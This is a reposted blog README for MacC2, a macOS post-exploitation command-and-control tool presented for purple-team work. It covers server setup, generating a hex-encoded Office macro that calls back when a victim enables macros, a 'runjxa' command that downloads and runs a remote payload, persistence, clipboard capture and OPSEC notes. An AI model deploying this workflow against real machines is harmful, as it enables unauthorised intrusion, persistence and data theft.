MacC2 - Mac Command And Control That Uses Internal API Calls Instead Of Command Line Utilities
2020-11-17 05:30:00 Author: www.blogger.com(查看原文) 阅读量:130 收藏

tag:blogger.com,1999:blog-8317222231133660547.post-78238852736802056732020-11-16T17:30:00.054-03:002020-11-16T17:30:00.304-03:00MacC2 - Mac Command And Control That Uses Internal API Calls Instead Of Command Line Utilities<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-He9F4-llbFY/X7H2ikH9vQI/AAAAAAAAUXY/6yDSj3ZKujsP97ogOCw3svushxeUXOyKgCNcBGAsYHQ/s3289/MacC2_9_pic7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="956" data-original-width="3289" height="186" src="https://1.bp.blogspot.com/-He9F4-llbFY/X7H2ikH9vQI/AAAAAAAAUXY/6yDSj3ZKujsP97ogOCw3svushxeUXOyKgCNcBGAsYHQ/w640-h186/MacC2_9_pic7.png" width="640" /></a></div><p><br /></p><p>MacC2 is a macOS <a href="https://www.kitploit.com/search/label/Post%20Exploitation" target="_blank" title="post exploitation">post exploitation</a> tool written in python that uses Objective C calls or python libraries as opposed to <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> executions. The client is written in python2, which though deprecated is still being shipped with base Big Sur installs. It is possible down the road that Apple will remove python2 (or python altogether) from base macOS installs but as of Nov 2020 this is not the case. <strong>I wrote this tool to aid <a href="https://www.kitploit.com/search/label/Purple%20Team" target="_blank" title="purple team">purple team</a> exercises aimed at building detections for python-based post <a href="https://www.kitploit.com/search/label/Exploitation" target="_blank" title="exploitation">exploitation</a> frameworks on macOS</strong>. Apple plans to eventu ally remove scripting runtimes from base macOS installs, but it appears that python is still included by default on base installs of Big Sur.</p><span><a name='more'></a></span><p><br /></p> <p>You can set up the server locally or you can use the docker setup I have included in this repo. Instructions below:</p> <br /><span style="font-size: large;"><b>Instructions for Running Using Docker:</b></span><br /> <p><em><strong>If you do not already have docker set up:</strong></em></p> <ol> <li><code>chmod +x install_docker_linux.sh</code></li> <li><code>sudo ./install_docker_linux.sh</code></li> </ol> <p><em><strong>Next:</strong></em></p> <ol> <li><code>chmod +x setup.sh</code></li> <li><code>sudo ./setup.sh</code> <strong>(this will create an untrusted ssl cert and key, generate a macro file for the server and port you specify (will drop the macro in macro.txt locally), build macc2-docker, and run the MacC2 server inside of macc2-container in interactive mode)</strong></li> <li>when prompted, enter the IP/hostname of the MacC2 server<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-MAV0U_iK_10/X7H2rSM8l3I/AAAAAAAAUXc/x474QsCjtWAiMQ-mI7exVmLPwU4C0cruwCNcBGAsYHQ/s868/MacC2_1_pic30.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="90" data-original-width="868" height="66" src="https://1.bp.blogspot.com/-MAV0U_iK_10/X7H2rSM8l3I/AAAAAAAAUXc/x474QsCjtWAiMQ-mI7exVmLPwU4C0cruwCNcBGAsYHQ/w640-h66/MacC2_1_pic30.png" width="640" /></a></div><br /></li> <li>when prompted, enter the port that the MacC2 server will listen on<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-UqUZV0Ftguw/X7H2zv2ZueI/AAAAAAAAUXk/gsCfBkj-CIsXVatcxcXTYbj0A5gcYDqgQCNcBGAsYHQ/s956/MacC2_2_pic31.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="92" data-original-width="956" height="62" src="https://1.bp.blogspot.com/-UqUZV0Ftguw/X7H2zv2ZueI/AAAAAAAAUXk/gsCfBkj-CIsXVatcxcXTYbj0A5gcYDqgQCNcBGAsYHQ/w640-h62/MacC2_2_pic31.png" width="640" /></a></div><br /></li> <li>A hex encoded macro payload will be dropped locally in a file named macro.txt that is configured to connect to your MacC2 server on the hostname/IP and port you specified.<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-EB9AoLNq6TY/X7H25Ssu52I/AAAAAAAAUXo/0zI9wuOfaNkBYcJ123Wub7a_cCL5PxZewCNcBGAsYHQ/s2942/MacC2_3_pic32.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="2942" height="54" src="https://1.bp.blogspot.com/-EB9AoLNq6TY/X7H25Ssu52I/AAAAAAAAUXo/0zI9wuOfaNkBYcJ123Wub7a_cCL5PxZewCNcBGAsYHQ/w640-h54/MacC2_3_pic32.png" width="640" /></a></div><br /></li> <li>Docker will install the aiohttp python3 dependency, build macc2-docker, and will run the MacC2 Server in a container named macc2-container. Once finished the MacC2 server will listen on the specified port:<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-_ofTmNU5olk/X7H2-Mne8nI/AAAAAAAAUXw/K223yxss2xIJMohbFpo-GVZzmKBTCmIIwCNcBGAsYHQ/s2048/MacC2_4_pic33.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="498" data-original-width="2048" height="156" src="https://1.bp.blogspot.com/-_ofTmNU5olk/X7H2-Mne8nI/AAAAAAAAUXw/K223yxss2xIJMohbFpo-GVZzmKBTCmIIwCNcBGAsYHQ/w640-h156/MacC2_4_pic33.png" width="640" /></a></div><br /></li> <li>You can run <em>docker ps</em> and validate that the MacC2 server is running (you will see a container named macc2-container listed there)</li> </ol> <p><strong>Note: Since I am using a static container name (macc2-container), if you run this setup more than once on the same server, you will need to delete the macc2-container name after each use or else you will get an error "The container name "/macc2-container" is already in use by container". You can run the command below to delete the macc2-container after each run:</strong></p> <blockquote> <p>docker rm macc2-container</p> </blockquote> <p>You can then either copy the MacC2_client.py file over to the client and execute for a callback or you can import the macro.txt macro into an Office document and "Enable Macros" when opening for a callback on the client.</p> <br /><span style="font-size: large;"><b>Running Locally (Without Using Docker)</b></span><br /> <p>If you opt to not use docker, you can set up the server locally using the steps below:</p> <p>Since the MacC2 server uses the aiohttp library for communications, you will need to install aiohttp first:</p> <p><code>pip install aiohttp</code> <strong>(if you encounter an error ensure that pip is pointing to python3, since aiohttp is a python3 library)</strong>:</p> <p><code>python3 -m pip install --upgrade --force pip</code></p> <p><strong><em>On C2 Server:</em></strong></p> <ol> <li>Set up ssl (note: use a key size of at least 2048)</li> </ol> <p>If you do not have your own cert, you can use the following to generate a self signed cert:</p> <ul> <li> 1: <code>openssl req -new -newkey rsa:2048 -nodes -out ca.csr -keyout ca.key</code> </li> <li> 2: <code>openssl x509 -trustout -signkey ca.key -days 365 -req -in ca.csr -out ca.pem</code> </li> </ul> <p><strong>note: the server script is hard-coded to use ca.pem and ca.key, so keep these names the same for now, or change the code appropriately</strong></p> <ol start="2"> <li>Use macro_generator.py to create the MacC2 scripts with the server's IP/domain and port. macro_generator.py also builds a macro (macro.txt) that uses hex encoding to run MacC2. You can copy and paste the contents of macro.text into an MS Office document:</li> </ol> <p>Usage:</p> <p><code>python3 macro_generatory.py -s [C2 Server IP/domain] -p [C2 Server Port]</code></p> <p>-Example:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-FHKiE7MZ6dQ/X7H3DQjK-gI/AAAAAAAAUX4/KVh3XWohHlgKLbMHvTg8ZaUn3dUpwoCfQCNcBGAsYHQ/s2724/MacC2_5_pic3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="404" data-original-width="2724" height="94" src="https://1.bp.blogspot.com/-FHKiE7MZ6dQ/X7H3DQjK-gI/AAAAAAAAUX4/KVh3XWohHlgKLbMHvTg8ZaUn3dUpwoCfQCNcBGAsYHQ/w640-h94/MacC2_5_pic3.png" width="640" /></a></div><p><br /></p> <ol start="3"> <li>Start the generated MacC2_server.py script to listen for a connection:</li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-FGM52djRFGQ/X7H3as61pQI/AAAAAAAAUYI/kwAbTlUAUzUrpGJenr8BKcJrKCBBBTg8wCNcBGAsYHQ/s1500/MacC2_6_pic4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="328" data-original-width="1500" height="140" src="https://1.bp.blogspot.com/-FGM52djRFGQ/X7H3as61pQI/AAAAAAAAUYI/kwAbTlUAUzUrpGJenr8BKcJrKCBBBTg8wCNcBGAsYHQ/w640-h140/MacC2_6_pic4.png" width="640" /></a></div><p><br /></p> <p><strong><em>On <a href="https://www.kitploit.com/search/label/Client%20Side" target="_blank" title="Client Side">Client Side</a> (the target mac host):</em></strong></p> <ol> <li> If you desire to not be limited by the mac sandbox and want more functionality, you may opt to copy the MacC2_client.py script to the client (assuming you have access). </li> <li> On the client, run the MacC2_client.py script: <code>python MacC2_client.py</code></li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-eW1GZ8IqkRI/X7H3gch7nwI/AAAAAAAAUYM/unHnYT9exr4_eh8PpfReprYcMm8dy_WyACNcBGAsYHQ/s912/MacC2_7_pic5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="58" data-original-width="912" height="40" src="https://1.bp.blogspot.com/-eW1GZ8IqkRI/X7H3gch7nwI/AAAAAAAAUYM/unHnYT9exr4_eh8PpfReprYcMm8dy_WyACNcBGAsYHQ/w640-h40/MacC2_7_pic5.png" width="640" /></a></div><p><br /></p> <ol start="3"> <li>On the server, you will see an inbound connection. Example below:</li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-sIhzQ1-CYhA/X7H3mkRbytI/AAAAAAAAUYQ/pwDJMo_AkA4MjzZyIt74DJ4Oid9_rFPpACNcBGAsYHQ/s1508/MacC2_8_pic6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="326" data-original-width="1508" height="138" src="https://1.bp.blogspot.com/-sIhzQ1-CYhA/X7H3mkRbytI/AAAAAAAAUYQ/pwDJMo_AkA4MjzZyIt74DJ4Oid9_rFPpACNcBGAsYHQ/w640-h138/MacC2_8_pic6.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b>Using MacC2</b></span><br /> <p>After you receive a connection, you can use the "help" command on the server to get a list of built-in commands available. You can enter one of these commands. After entering a command and pressing Enter, the command is queued up (allows you to enter multiple commands to be executed by the client). Once you type "done" and hit Enter, all of the queued commands will be sent to the client for execution.</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-JmJ4ZhiNKl4/X7H3tKIU_PI/AAAAAAAAUYY/hqhqLL1fKkE_LdCtOa25uDNQq16pKwSvwCNcBGAsYHQ/s3289/MacC2_9_pic7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="956" data-original-width="3289" height="186" src="https://1.bp.blogspot.com/-JmJ4ZhiNKl4/X7H3tKIU_PI/AAAAAAAAUYY/hqhqLL1fKkE_LdCtOa25uDNQq16pKwSvwCNcBGAsYHQ/w640-h186/MacC2_9_pic7.png" width="640" /></a></div><p>&nbsp;</p> <p>Each command is pretty straightforward. The command options that are not OPSEC safe (i.e., command line executions or cause pop ups) are also flagged in red from the help menu.</p> <p>Functions of Note:</p> <ul> <li>You can generate a Mythic C2 JXA .js payload, download it, and host it on a remote server. Then you can provide the url to the hosted file to MacC2 using the <strong>runjxa</strong> command to have MacC2 download and execute the Mythic .JXA payload:</li> </ul> <p><code>&gt;&gt;&gt; runjxa &lt;url_to_JXA_.js_payload&gt;</code></p> <p><strong>Note: If you gain access using the MS Office macro, then the persistence method will not work due to sandboxing. The files will still be dropped and the login item will still be inserted but upon reboot the quarantine attribute prevents the persistence from executing</strong></p> <br /><span style="font-size: large;"><b>Additional Info</b></span><br /> <p>The MacC2 server uses aiohttp to easily allow for asynchronous web comms. To ensure that only MacC2 agents can access the server, the server includes the following:</p> <ul> <li> A specific user agent string check (if a request fails this check it receives a 404 Not Found) </li> <li> A specific token (if a request failes this check it receives a 404 Not Found) </li> </ul> <p>The operator flow after setting everything up and getting a callback is:</p> <ul> <li> view help menu for command options </li> <li> enter command name and press enter for each command you want to run </li> <li> enter "done" and press enter to have the queued commands sent to the client for execution </li> <li> <strong>NOTE: The default sleep is 10 seconds. The operator can change that by using the sleep [numberofseconds] command.</strong> </li> <li> NOTE: The MacC2 server currently does not have a way to conveniently switch between sessions when multiple clients connect. Instead the server auto switches between sessions after each command executed. So the operator will need to pay attention to the IP in the connection to know which session is being interacted with. </li> </ul> <br /><span style="font-size: large;"><b>Macro Limitations</b></span><br /> <p>MacC2 does NOT include any sandbox escapes and therefore all functions do not work when access is gained via the Office macro. Functions that DO work from the sandbox include:</p> <ul> <li> runjxa </li> <li> systeminfo </li> <li> persist: MacC2 can drop files to disk from a sandboxed macro payload. However, upon reboot the persistence will not execute due to the quarantine attribue on the dropped files. </li> <li> addresses </li> <li> prompt </li> <li> clipboard </li> <li> shell (not OPSEC safe) </li> <li> spawn (not OPSEC safe) </li> <li> cd and listdir (sandbox prevents access for most directories but you can see the root '/' directory and potentially others as well)</p></li></ul><div><br /></div> <p><strong><em>DISCLAIMER</em></strong></p> <p>This is for academic purposes and should not be used maliciously or without the appropriate authorizations and approvals.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/cedowens/MacC2" rel="nofollow" target="_blank" title="Download MacC2">Download MacC2</a></span></b></div>Zion3R[email protected]

文章来源: http://www.blogger.com/feeds/8317222231133660547/posts/default/7823885273680205673
如有侵权请联系:admin#unsafe.sh